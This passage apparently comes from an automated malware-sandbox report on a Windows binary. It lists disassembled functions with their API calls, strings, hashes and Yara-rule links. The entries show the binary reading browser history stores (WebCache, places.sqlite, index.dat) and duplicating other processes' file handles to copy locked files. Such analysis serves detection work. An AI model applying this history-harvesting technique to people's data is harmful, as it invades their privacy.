                                • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041443E, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43COMMON
                                Download Yara Rule
                                APIs
                                • wcschr.MSVCRT ref: 00414458
                                • _snwprintf.MSVCRT ref: 0041447D
                                • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: PrivateProfileString$Write_snwprintfwcschr
                                • String ID: "%s"
                                • API String ID: 1343145685-3297466227
                                • Opcode ID: aabbe202c5f79078aea71dac5ab2605718744c8b92afc7520f4e067a7367162e
                                • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                • Opcode Fuzzy Hash: aabbe202c5f79078aea71dac5ab2605718744c8b92afc7520f4e067a7367162e
                                • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00413CA4, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloadertimeCOMMON
                                Download Yara Rule
                                APIs
                                • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: AddressHandleModuleProcProcessTimes
                                • String ID: GetProcessTimes$kernel32.dll
                                • API String ID: 1714573020-3385500049
                                • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041F1A5, Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 165COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: memcmp
                                • String ID: @ $SQLite format 3
                                • API String ID: 1475443563-3708268960
                                • Opcode ID: bc797f5c287fbec082bfe36368e8bdb92b626008a1b8340b8f00afaa449410d4
                                • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                • Opcode Fuzzy Hash: bc797f5c287fbec082bfe36368e8bdb92b626008a1b8340b8f00afaa449410d4
                                • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004110DC, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 68COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: _wcsicmpqsort
                                • String ID: /nosort$/sort
                                • API String ID: 1579243037-1578091866
                                • Opcode ID: a0f12cb90dd745c164ef67684cb79943b88980d13b6e843c418957b63f9314a7
                                • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                • Opcode Fuzzy Hash: a0f12cb90dd745c164ef67684cb79943b88980d13b6e843c418957b63f9314a7
                                • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040E5ED, Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 61COMMON
                                Download Yara Rule
                                APIs
                                • memset.MSVCRT ref: 0040E60F
                                • memset.MSVCRT ref: 0040E629
                                  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                Strings
                                • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: memsetwcslen$AttributesFileFolderPathSpecialwcscatwcscpy
                                • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                • API String ID: 2887208581-2114579845
                                • Opcode ID: 45b77cc57d7adabb6b76daf53bfb3be083a41c4971f5e6ab387fbe8a56a2d209
                                • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                • Opcode Fuzzy Hash: 45b77cc57d7adabb6b76daf53bfb3be083a41c4971f5e6ab387fbe8a56a2d209
                                • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004148B6, Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                Download Yara Rule
                                APIs
                                • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                • LockResource.KERNEL32(00000000), ref: 004148EF
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: Resource$FindLoadLockSizeof
                                • String ID:
                                • API String ID: 3473537107-0
                                • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0044DEF7, Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: ??3@
                                • String ID:
                                • API String ID: 613200358-0
                                • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                                • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0043A9F6, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 979COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: memset
                                • String ID: only a single result allowed for a SELECT that is part of an expression
                                • API String ID: 2221118986-1725073988
                                • Opcode ID: d115b1de85cb0c2c74241db9f2e26d4ca9f76d3b3ab36ed3aa85b1754c3cbe0d
                                • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                • Opcode Fuzzy Hash: d115b1de85cb0c2c74241db9f2e26d4ca9f76d3b3ab36ed3aa85b1754c3cbe0d
                                • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004175B7, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24sleepCOMMON
                                Download Yara Rule
                                APIs
                                • Sleep.KERNEL32(00000064), ref: 004175D0
                                • FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,0045DBC0,00417C24,00000008,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: ChangeCloseFindNotificationSleep
                                • String ID: }A
                                • API String ID: 1821831730-2138825249
                                • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004125B6, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: ??3@DeleteObject
                                • String ID: r!A
                                • API String ID: 1103273653-628097481
                                • Opcode ID: 35011d0761a793af9b86058f165b74ada9e8dfd6de6a99c5cda2ffee1e56a26e
                                • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                • Opcode Fuzzy Hash: 35011d0761a793af9b86058f165b74ada9e8dfd6de6a99c5cda2ffee1e56a26e
                                • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040D092, Relevance: 5.1, APIs: 4, Instructions: 51COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: ??2@
                                • String ID:
                                • API String ID: 1033339047-0
                                • Opcode ID: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                • Opcode Fuzzy Hash: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00444B06, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                • memcmp.MSVCRT ref: 00444BA5
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: AddressProc$memcmp
                                • String ID: $$8
                                • API String ID: 2808797137-435121686
                                • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00430737, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 94COMMON
                                Download Yara Rule
                                Strings
                                • duplicate column name: %s, xrefs: 004307FE
                                • too many columns on %s, xrefs: 00430763
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID:
                                • String ID: duplicate column name: %s$too many columns on %s
                                • API String ID: 0-1445880494
                                • Opcode ID: 7e9b6645e50301b73c799b582cda44e61fb49136c81ea503956771b4ac800c5f
                                • Instruction ID: 332525b9e829d337f3b342900587a6bcab00951879d739311f42b30c77ca79e1
                                • Opcode Fuzzy Hash: 7e9b6645e50301b73c799b582cda44e61fb49136c81ea503956771b4ac800c5f
                                • Instruction Fuzzy Hash: 5E314735500705AFCB109F55C891ABEB7B5EF88318F24815BE8969B342C738F841CB99
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040E4B2, Relevance: 4.6, APIs: 3, Instructions: 87fileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                  • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                  • Part of subcall function 0040E01E: DuplicateHandle.KERNEL32(?,00000104,00000000), ref: 0040E0BF
                                  • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                  • Part of subcall function 0040E01E: CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                  • Part of subcall function 0040E01E: MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                  • Part of subcall function 0040E01E: WriteFile.KERNEL32(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                  • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                  • Part of subcall function 0040E01E: CloseHandle.KERNEL32(?), ref: 0040E13E
                                • CloseHandle.KERNEL32(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                  • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                  • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                  • Part of subcall function 0040E2AB: memcpy.MSVCRT ref: 0040E3EC
                                • DeleteFileW.KERNEL32(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                  • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                  • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                  • Part of subcall function 0040E175: ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: File$Handle$Close$ProcessViewmemset$??3@CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintfmemcpywcschr
                                • String ID:
                                • API String ID: 2722907921-0
                                • Opcode ID: db5b060151050967cb8a3560fbfd23956168ef1b290a982d56d7add8c3b4651d
                                • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                • Opcode Fuzzy Hash: db5b060151050967cb8a3560fbfd23956168ef1b290a982d56d7add8c3b4651d
                                • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00403A16, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 67COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                  • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                  • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                  • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                • memset.MSVCRT ref: 00403A55
                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                  • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                  • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                  • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                  • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: memsetwcscatwcslen$??3@$AttributesFilememcpywcscpy
                                • String ID: history.dat$places.sqlite
                                • API String ID: 3093078384-467022611
                                • Opcode ID: 3785298ac20b2a611d3c3277302934fe50b5cf091534855024bd32ed14c81bb0
                                • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                • Opcode Fuzzy Hash: 3785298ac20b2a611d3c3277302934fe50b5cf091534855024bd32ed14c81bb0
                                • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040B2F5, Relevance: 4.6, APIs: 3, Instructions: 66COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0040B1D1: wcslen.MSVCRT ref: 0040B1DE
                                  • Part of subcall function 0040B1D1: ??3@YAXPAX@Z.MSVCRT ref: 0040B201
                                  • Part of subcall function 0040B1D1: ??3@YAXPAX@Z.MSVCRT ref: 0040B224
                                  • Part of subcall function 0040B1D1: memcpy.MSVCRT ref: 0040B248
                                • memset.MSVCRT ref: 0040B32F
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,0040B432,000000FF,?,00000FFF,00000000,00000000,0040B432,00000000,-00000002,0040B626,00000000), ref: 0040B348
                                  • Part of subcall function 0040B0D1: strlen.MSVCRT ref: 0040B0D8
                                  • Part of subcall function 0040B0D1: ??3@YAXPAX@Z.MSVCRT ref: 0040B0FB
                                  • Part of subcall function 0040B0D1: ??3@YAXPAX@Z.MSVCRT ref: 0040B12C
                                  • Part of subcall function 0040B0D1: memcpy.MSVCRT ref: 0040B159
                                • ??3@YAXPAX@Z.MSVCRT ref: 0040B36F
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: ??3@$memcpy$ByteCharMultiWidememsetstrlenwcslen
                                • String ID:
                                • API String ID: 1562205978-0
                                • Opcode ID: 17909df3817d9cebc6fd13d723ff7355e8b74d0ee5d722764330b7a6cef48d19
                                • Instruction ID: b857a4007f161fa5246434627f102fbdc01d58e76d807d6b79cc7eff8a49146b
                                • Opcode Fuzzy Hash: 17909df3817d9cebc6fd13d723ff7355e8b74d0ee5d722764330b7a6cef48d19
                                • Instruction Fuzzy Hash: 18212771900218BFDB009B98EC44C9A37ACEB46329F10823BFC45A7292D7B8DD549B5D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004175ED, Relevance: 4.5, APIs: 3, Instructions: 49fileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                  • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                  • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                • GetLastError.KERNEL32 ref: 00417627
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: ErrorLast$File$PointerRead
                                • String ID:
                                • API String ID: 839530781-0
                                • Opcode ID: 43cd8d8e6b63bda72f55cb56ee55d1ec8e5478229177a04f989a23650c495d71
                                • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                • Opcode Fuzzy Hash: 43cd8d8e6b63bda72f55cb56ee55d1ec8e5478229177a04f989a23650c495d71
                                • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040B3C1, Relevance: 4.5, APIs: 3, Instructions: 47COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: memset
                                • String ID:
                                • API String ID: 2221118986-0
                                • Opcode ID: 7e1d4fae5655a69f0d9e255d5eea8c4cd8ca5fcd0e36236478752201c4e29ed9
                                • Instruction ID: ab827e58211017b50a374ecff23b92c7d33c5c2594aefa3e9ea54b4f7b6580b8
                                • Opcode Fuzzy Hash: 7e1d4fae5655a69f0d9e255d5eea8c4cd8ca5fcd0e36236478752201c4e29ed9
                                • Instruction Fuzzy Hash: 6A0167B3904308AAFB24D791DD8AB9A73ACDB14714F5100BBA704E21C3EBBC9B45865D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040C1D3, Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 45COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: FileFindFirst
                                • String ID: *.*$index.dat
                                • API String ID: 1974802433-2863569691
                                • Opcode ID: 357f5a483d779ef34e4c4d87daa9b3f5529f5b59003a03b6604f1343cb38d30a
                                • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                • Opcode Fuzzy Hash: 357f5a483d779ef34e4c4d87daa9b3f5529f5b59003a03b6604f1343cb38d30a
                                • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004099F4, Relevance: 4.5, APIs: 3, Instructions: 38COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
